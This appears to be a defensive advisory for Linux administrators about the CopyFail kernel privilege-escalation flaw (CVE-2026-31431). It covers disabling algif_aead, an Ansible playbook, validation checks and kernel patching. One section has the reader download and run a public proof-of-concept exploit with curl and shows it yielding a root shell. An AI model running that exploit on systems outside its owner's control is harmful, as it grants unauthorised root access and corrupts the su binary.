TL;DR
CopyFail (CVE-2026-31431) is a kernel-level LPE affecting every major Linux distro since 2017. Disable algif_aead immediately to eliminate the attack surface. Patch kernels later.
Impact: Any unprivileged process becomes root. This chains with web RCE, weak credentials, or plugin vulnerabilities to escalate from application-level compromise to kernel control.
Immediate action (5 minutes per host)
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null || trueVerify:
lsmod | grep algif_aead # Should return nothing
cat /etc/modprobe.d/disable-algif.conf # Should show the install lineThen patch your kernel to mainline commit a664bf3d603d or later. All major distros have releases available.
Ansible Deployment
Deploy across your Magento infrastructure in one run:
- hosts: magento_servers
become: true
tasks:
- name: Disable algif_aead module
copy:
dest: /etc/modprobe.d/disable-algif.conf
content: |
install algif_aead /bin/false
owner: root
group: root
mode: '0644'
- name: Check if algif_aead module is loaded
shell: lsmod | grep -w algif_aead
register: algif_loaded
failed_when: false
changed_when: false
- name: Unload algif_aead module
command: rmmod algif_aead
when: algif_loaded.rc == 0Run once:
ansible-playbook deploy-algif-disable.yaml -i hosts.yamlValidation
Check each host individually, Both commands should return nothing (or at least no algif_aead):
# Check module is not loaded
lsmod | grep algif_aead
# Check modprobe configuration is in place
cat /etc/modprobe.d/disable-algif.conf
# Verify AF_ALG sockets aren't being used by applications
ss -xa | grep AF_ALG
lsof 2>/dev/null | grep AF_ALG
Additionally, if you want a bit more assurance, you can either run the public PoC yourself or simply try to create a AF_ALG socket with python.
Test with Socket Creation
python3 -c "import socket
try:
s=socket.socket(38,5,0)
s.bind(('aead','authencesn(hmac(sha256),cbc(aes))'))
print('[!] WARNING: System allows AF_ALG socket creation.' +
' Likely vulnerable to Copy Fail CVE-2026-31431.')
except Exception as e:
print(f'[+] SAFE: Cannot create socket. ({e})')
"Test with Public PoC
NOTE: If you are vulnerable, this WILL break your SU binary and allow any user on the system to become root. See below, if you need to revert this.
$ curl https://copy.fail/exp > exp.py
$ cat exp.py # READ/COMPARE WITH SRC BEFORE RUNNING
$ python3 exp.py && su
$ id
uid=0(root) gid=1002(user) groups=1002(user)How to Revert the Proof of Concept
If you ran the proof on concept and broken your SU (either successfully or just corrupting the binary), a few ways you can recover:
- Reboot your machine (the SU binary will be reloaded from disk and work again)
- Flush caches
sudo sync && sudo echo 3 > /proc/sys/vm/drop_caches
Why Disable AF_ALG Instead of Patching Immediately?
- Speed: Takes 30 seconds per host vs. downtime for kernel patches
- No impact: Almost nothing uses AF_ALG userspace sockets in production
- Bridge time: Gives you time to test kernel patches in staging before rolling to production
- Defence in depth: Reduces attack surface even after kernel patches
Performance Impact
Zero for applications not using AF_ALG. For the rare cases that do, crypto operations fall back to userspace libraries (which is what 99% of systems already use). No measurable performance difference.
Kernel Patching
Where to find patched kernels:
- Ubuntu / Debian:
apt update && apt upgrade(check kernel version >= 6.x with commit a664bf3d603d) - RHEL / CentOS / Fedora:
yum update kernelordnf update kernel - Amazon Linux 2:
yum update kernel - SUSE:
zypper update kernel-default - Arch:
pacman -Syu
What to check:
uname -r # Current kernel versionMost distributions have released patched kernels by 2026-04-29. Update aggressively.